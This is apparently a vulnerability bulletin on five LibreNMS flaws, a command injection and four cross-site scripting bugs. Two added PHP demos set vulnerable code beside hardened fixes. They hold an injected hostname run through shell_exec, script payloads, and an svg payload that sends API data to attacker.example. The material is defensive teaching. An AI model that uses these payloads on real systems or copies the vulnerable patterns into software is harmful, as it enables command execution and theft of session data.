SB20241115151 - Multiple vulnerabilities in LibreNMS
Published: November 15, 2024 Updated: April 24, 2026
Description
This security bulletin contains information about 5 security vulnerabilities.
1) Command injection (CVE-ID: CVE-2024-51092)
The vulnerability allows a remote user to execute arbitrary OS commands on the LibreNMS host.
The vulnerability exists due to improper neutralization of shell metacharacters in AboutController.php. When the /about page is rendered, the binary named by the snmpget configuration value is invoked with a device hostname through a shell, so a poisoned snmpget setting combined with a crafted hostname becomes a command line the shell executes. A remote user who can change that setting and add a device can execute arbitrary commands with the privileges of the web server user.
Exploitation requires chaining two capabilities: creating a device whose hostname contains shell metacharacters, and updating the snmpget setting through the web portal.
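The following is an added illustration of the bug class described above, not code from LibreNMS or from the advisory. It assumes nothing about AboutController.php beyond what the bulletin states: a configurable binary name and a device hostname are joined into one command line. /bin/echo stands in for the configured snmpget binary so the script runs on any Linux host and prints exactly the argv the program received; the hostname is constructed to carry shell metacharacters. The hardened variant validates the hostname against an IP/DNS-name allowlist and then starts the process with an argv array, so no shell ever parses the arguments.

```php
<?php
declare(strict_types=1);

// Stand-in for the configured snmpget binary: /bin/echo is used so the demo
// runs on any Linux box and prints exactly the argv the program received.
const SNMPGET_SETTING = '/bin/echo';

// Constructed device hostname carrying shell metacharacters; the trailing '#'
// comments out whatever the template appends after the hostname.
const EVIL_HOSTNAME = '127.0.0.1; id #';

// VULNERABLE pattern: setting and hostname are interpolated into one string
// and handed to /bin/sh by shell_exec(). The ';' terminates the intended
// command and the shell runs "id" as the web server user.
function runVulnerable(string $snmpget, string $hostname): string
{
    return (string) shell_exec("$snmpget -v2c -c public $hostname sysDescr.0 2>&1");
}

// Hostname allowlist: an IP address or a DNS name; anything else is rejected
// before it can reach a process. (Hypothetical helper, not a LibreNMS API.)
function isSafeHostname(string $hostname): bool
{
    if (filter_var($hostname, FILTER_VALIDATE_IP) !== false) {
        return true;
    }
    $label = '[A-Za-z0-9]([A-Za-z0-9-]{0,61}[A-Za-z0-9])?';
    return strlen($hostname) <= 253
        && preg_match("/^{$label}(\\.{$label})*\\.?$/", $hostname) === 1;
}

// HARDENED pattern: validate the hostname, then start the binary with an
// argv array via proc_open() (PHP >= 7.4), so no shell parses the arguments.
function runHardened(string $snmpget, string $hostname): string
{
    if (!isSafeHostname($hostname)) {
        throw new InvalidArgumentException("rejected hostname: $hostname");
    }
    $argv = [$snmpget, '-v2c', '-c', 'public', $hostname, 'sysDescr.0'];
    $spec = [1 => ['pipe', 'w'], 2 => ['pipe', 'w']];
    $proc = proc_open($argv, $spec, $pipes);
    if (!is_resource($proc)) {
        throw new RuntimeException('could not start ' . $snmpget);
    }
    $out = stream_get_contents($pipes[1]) . stream_get_contents($pipes[2]);
    fclose($pipes[1]);
    fclose($pipes[2]);
    proc_close($proc);
    return $out;
}

echo "vulnerable:\n", runVulnerable(SNMPGET_SETTING, EVIL_HOSTNAME);
try {
    runHardened(SNMPGET_SETTING, EVIL_HOSTNAME);
} catch (InvalidArgumentException $e) {
    echo "hardened: ", $e->getMessage(), "\n";
}
echo "hardened (valid host): ", runHardened(SNMPGET_SETTING, '127.0.0.1');
```

Run it with `php demo.php`: the vulnerable branch prints echo's output followed by the output of `id`, while the hardened branch rejects the hostname and, for a clean host, prints the six argv elements untouched. Note that an argv array removes the shell but does not by itself neutralize the second half of the chain: the setting still chooses which binary runs, so a web-editable "path to snmpget" should be restricted to a fixed or administrator-only value rather than accepted as free text.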
2) Cross-site scripting (CVE-ID: CVE-2024-50351)
The vulnerability allows a remote user to execute arbitrary JavaScript in the context of another user's session.
The vulnerability exists due to improper neutralization of input during web page generation in the report_this() function and in the device logs tab when handling the "section" parameter. A remote privileged user can send a specially crafted URL to a victim to execute arbitrary JavaScript in the context of the victim's session.
User interaction is required: the victim must open the crafted page.
3) Cross-site scripting (CVE-ID: CVE-2024-51496)
The vulnerability allows a remote user to execute arbitrary JavaScript in the context of another user's session.
The vulnerability exists due to insufficient sanitization of the "metric" parameter of the /wireless and /health endpoints before it is written into the generated page. A remote privileged user can send a specially crafted URL to a victim to execute arbitrary JavaScript in the context of the victim's session.
User interaction is required: the victim must open the crafted page.
4) Cross-site scripting (CVE-ID: CVE-2024-52526)
The vulnerability allows a remote user to execute arbitrary JavaScript in other users' sessions.
The vulnerability exists due to insufficient sanitization of the "descr" parameter in librenms/includes/html/pages/device/services.inc.php within the device services editing workflow. A remote privileged user can submit a specially crafted service description that is stored and later rendered unescaped, executing arbitrary JavaScript in the session of every user who views it.
User interaction is required: the payload runs when another user opens the device's "Services" tab. The normal "Add Service" form, which submits an ajax_form.php request with "type=create-service", is not affected; the unsafe value is introduced through the editing workflow.
5) Cross-site scripting (CVE-ID: CVE-2024-50352)
The vulnerability allows a remote user to execute arbitrary JavaScript in other users' sessions.
The vulnerability exists due to improper neutralization of input during web page generation in the Services section of the Device Overview page when the "name" parameter is processed in the device services editing workflow. A remote privileged user can submit a specially crafted service name that is stored and later rendered unescaped, executing arbitrary JavaScript in the session of every user who views it.
User interaction is required: the payload runs when another user opens the device overview page. The normal "Add Service" form is not affected; the unsafe value is introduced through the editing workflow.
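The following is an added example covering the four cross-site scripting entries above (2 and 3 reflected through a URL parameter, 4 and 5 stored through the service editing workflow). It is not LibreNMS code and does not reproduce the affected templates; the URL form, the KNOWN_METRICS allowlist, the helper names and the payloads are constructed for illustration. It shows the vulnerable sink next to its hardened form for both cases, and why the hardened stored-XSS fix lives at the output sink: encoding there covers every path that can write the row, which is the lesson of "the normal Add Service form is not affected but the edit workflow is".

```php
<?php
declare(strict_types=1);

// Constructed payloads standing in for a reflected "metric" parameter and a
// stored service name/description written through the edit workflow.
const EVIL_METRIC  = '"><script>alert(document.cookie)</script>';
const EVIL_SERVICE = [
    'service_name' => '<img src=x onerror="alert(1)">',
    'service_desc' => '<svg onload="fetch(\'/api/v0/devices\').then(r=>r.text()).then(t=>navigator.sendBeacon(\'https://attacker.example/\',t))">',
];

// One encoder for every HTML text and quoted-attribute sink (hypothetical
// helper name; Blade's {{ }} or htmlspecialchars() in includes do the same).
function e(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

// Reflected XSS, VULNERABLE: the parameter is echoed into an attribute and
// into text. The leading '">' closes the <a> tag and the script element runs.
function renderMetricTabVulnerable(string $metric): string
{
    return '<a href="/health?metric=' . $metric . '">' . $metric . '</a>';
}

// Reflected XSS, HARDENED: the metric selects a known graph, so allowlist it
// first; then encode once for the URL and once for the HTML attribute.
const KNOWN_METRICS = ['frequency', 'temperature', 'voltage', 'ccq', 'rssi']; // constructed list

function renderMetricTabHardened(string $metric): string
{
    if (!in_array($metric, KNOWN_METRICS, true)) {
        throw new InvalidArgumentException('unknown metric');
    }
    return '<a href="/health?metric=' . e(rawurlencode($metric)) . '">' . e($metric) . '</a>';
}

// Stored XSS, VULNERABLE: whatever reached the database is written straight
// into the Services tab that every other viewer of the device page loads.
function renderServiceRowVulnerable(array $svc): string
{
    return "<tr><td>{$svc['service_name']}</td><td>{$svc['service_desc']}</td></tr>";
}

// Stored XSS, HARDENED: encode at the output sink. This covers the create
// form, the edit workflow, the API and direct SQL alike, instead of relying
// on the one form that happened to filter its input.
function renderServiceRowHardened(array $svc): string
{
    return '<tr><td>' . e($svc['service_name']) . '</td><td>' . e($svc['service_desc']) . '</td></tr>';
}

// Crude check: does the raw payload survive verbatim into the rendered HTML?
function payloadSurvives(string $html, string $payload): bool
{
    return strpos($html, $payload) !== false;
}

foreach ([
    'metric vulnerable'  => renderMetricTabVulnerable(EVIL_METRIC),
    'service vulnerable' => renderServiceRowVulnerable(EVIL_SERVICE),
    'service hardened'   => renderServiceRowHardened(EVIL_SERVICE),
] as $label => $html) {
    printf("%-18s %s\n", $label, $html);
}
var_dump(payloadSurvives(renderServiceRowVulnerable(EVIL_SERVICE), EVIL_SERVICE['service_desc']));
var_dump(payloadSurvives(renderServiceRowHardened(EVIL_SERVICE), EVIL_SERVICE['service_desc']));
try {
    renderMetricTabHardened(EVIL_METRIC);
} catch (InvalidArgumentException $ex) {
    echo "metric hardened: ", $ex->getMessage(), "\n";
}
echo "metric hardened: ", renderMetricTabHardened('temperature'), "\n";
```

Run it with `php demo.php`. The two vulnerable renderers emit the payloads as live markup, the hardened service row turns every `<`, `>` and quote into an entity so the description is displayed rather than executed, and the hardened metric renderer rejects anything outside the allowlist before it reaches the page. When triaging these entries on an installation, the same check applies: a reviewer who grep-tests only the "Add Service" form will miss items 4 and 5, because the unescaped sink, not the form, is the defect.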
Remediation
Install the update from the vendor's website.
References
- https://github.com/librenms/librenms/security/advisories/GHSA-x645-6pf9-xwxw
- https://github.com/librenms/librenms/security/advisories/GHSA-v7w9-63xh-6r3w
- https://github.com/advisories/GHSA-v7w9-63xh-6r3w
- https://github.com/librenms/librenms/security/advisories/GHSA-28p7-f6h6-3jh3
- https://github.com/advisories/GHSA-28p7-f6h6-3jh3
- https://github.com/librenms/librenms/security/advisories/GHSA-8fh4-942r-jf2g
- https://github.com/librenms/librenms/security/advisories/GHSA-qr8f-5qqg-j3wg